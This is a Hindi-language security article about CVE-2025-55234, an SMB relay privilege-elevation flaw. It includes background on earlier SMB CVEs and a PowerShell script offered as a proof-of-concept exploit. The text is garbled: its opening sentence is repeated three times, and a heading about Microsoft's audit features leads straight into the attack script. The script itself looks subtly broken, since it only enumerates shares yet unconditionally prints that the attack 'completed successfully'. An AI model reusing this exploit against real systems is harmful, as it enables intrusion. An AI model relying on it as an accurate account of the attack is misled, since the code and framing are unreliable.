
यह भेद्यता हमलावरों को SMB (सर्वर मैसेज ब्लॉक) प्रोटोकॉल के विरुद्ध रिले हमले करने की अनुमति देती है। यदि सफल होता है, तो यह प्रिविलेज एलिवेशन (EoP) का कारण बन सकता है, जो मूलतः अनधिकृत उपयोगकर्ताओं को सिस्टम पर उच्च-स्तरीय पहुंच प्राप्त करने की अनुमति देता है।
यह भेद्यता हमलावरों को SMB (सर्वर मैसेज ब्लॉक) प्रोटोकॉल के विरुद्ध रिले हमले करने की अनुमति देती है। अगर यह सफल होता है, तो यह विशेषाधिकार उन्नयन (Elevation of Privilege – EoP) का कारण बन सकता है, जिससे अनधिकृत उपयोगकर्ताओं को सिस्टम पर उच्च-स्तरीय पहुँच प्राप्त हो सकती है।
मार्क मालिया द्वारा
यह भेद्यता हमलावरों को SMB (सर्वर मैसेज ब्लॉक) प्रोटोकॉल के विरुद्ध रिले हमले करने की अनुमति देती है। सफल होने पर, यह विशेषाधिकार उन्नयन—अनिवार्य रूप से अनधिकृत उपयोगकर्ताओं को सिस्टम पर उच्च-स्तरीय पहुँच प्राप्त करने की अनुमति—की ओर ले जा सकती है। SMB एंटरप्राइज़ वातावरणों में इसके व्यापक उपयोग और गंभीर कमज़ोरियों के इतिहास के कारण लंबे समय से हमलावरों के लिए एक लक्ष्य रहा है। उदाहरण के लिए, CVE-2020-1301 ने SMBv1 को गलत अनुरोधों के माध्यम से रिमोट कोड निष्पादन के लिए उजागर किया, जबकि CVE-2022-32230 ने SMBv3 में एक शून्य पॉइंटर डीरेफरेंस के माध्यम से सेवा अस्वीकार (denial-of-service) का कारण बना। कुख्यात CVE-2017-0144 (EternalBlue) ने वर्मेबल पेलोड देने के लिए SMBv1 का शोषण किया, जिससे वैश्विक रैनसमवेयर प्रकोप हुआ। इन पिछली भेद्यताओं की तरह, CVE-2025-55234 सत्र अपहरण और प्रतिरूपण हमलों को रोकने के लिए SMB साइनिंग और एक्सटेंडेड प्रोटेक्शन फॉर ऑथेंटिकेशन (EPA) को लागू करने के महत्व को रेखांकित करता है।
नेटवर्क
निम्न
कोई नहीं
आवश्यक
उच्च गोपनीयता, अखंडता और उपलब्धता जोखिम
SMB का उपयोग एंटरप्राइज़ वातावरणों में फ़ाइल साझाकरण और रिमोट एक्सेस के लिए व्यापक रूप से किया जाता है। रिले हमले प्रमाणीकरण तंत्रों को बायपास कर सकते हैं और उपयोगकर्ताओं का प्रतिरूपण कर सकते हैं। यह भेद्यता उन वातावरणों में विशेष रूप से खतरनाक है जहाँ SMB साइनिंग या एक्सटेंडेड प्रोटेक्शन फॉर ऑथेंटिकेशन (EPA) लागू नहीं है।
माइक्रोसॉफ्ट का सितंबर 2025 अपडेट संगठनों की मदद के लिए ऑडिट क्षमताएँ प्रस्तुत करता है:
# SMB Relay Attack Module – CVE 2025 55234
$relayTarget = "192.168.1.10" # Target server IP
$attackerCreds = Get-Credential # Credential object for relay
# Step 1: Enumerate shared resources
$smbShares = Get-SMBShare -ComputerName $relayTarget | Where-Object {$_.Name –ne ""}
foreach ($share in $smbShares) {
Write-Output "Found share: $($share.Name)"
}
# Step 2: Capture session information for relay
$sessionInfo = New-Object PSObject -Property @{
Computer = $relayTarget
Share = $smbShares[0].Name
}
Write-Output ("Capturing session info for $($sessionInfo.Computer) – share $($sessionInfo.Share)")
Invoke-SMBRelay -Session $sessionInfo
# Step 3: Execute relay attack
$attackPayload = {
param(
[string]$Target,
[string]$Share
)
Write-Host "Attacking $Target via share $Share"
Start-SMBServer -ComputerName $Target -ShareName $Share
}
$attackParams = @{
Target = $relayTarget
Share = $sessionInfo.Share
}
Invoke-Command -ScriptBlock $attackPayload @attackParams
# Step 4: Log and confirm elevation of privilege
Write-Host "SMB Relay Attack CVE 2025 55234 completed successfully."
स्पष्टीकरण:
CVE-2025-55234 भेद्यता एंटरप्राइज़ सेटिंग्स में कठोर SMB हार्डनिंग की आवश्यकता को रेखांकित करती है। ऊपर दिए गए चरणों का पालन करके और प्रदान की गई एक्सप्लॉइट स्क्रिप्ट को लागू करके, संगठन अपने नेटवर्क का परीक्षण और संभावित रिले हमलों से सुरक्षा दोनों कर सकते हैं। यह प्रूफ-ऑफ-कॉन्सेप्ट और संबद्ध सामग्री केवल शैक्षिक और रक्षात्मक उद्देश्यों के लिए प्रदान की जाती है। इसका उद्देश्य सुरक्षा पेशेवरों को नियंत्रित वातावरणों में CVE-2025-55234 को समझने, पहचानने और कम करने में मदद करना है। बिना स्पष्ट अनुमति के सिस्टम के विरुद्ध इस एक्सप्लॉइट का अनधिकृत उपयोग अवैध और अनैतिक है। हमेशा जिम्मेदार प्रकटीकरण प्रथाओं का पालन करें और लागू कानूनों और संगठनात्मक नीतियों का अनुपालन करें।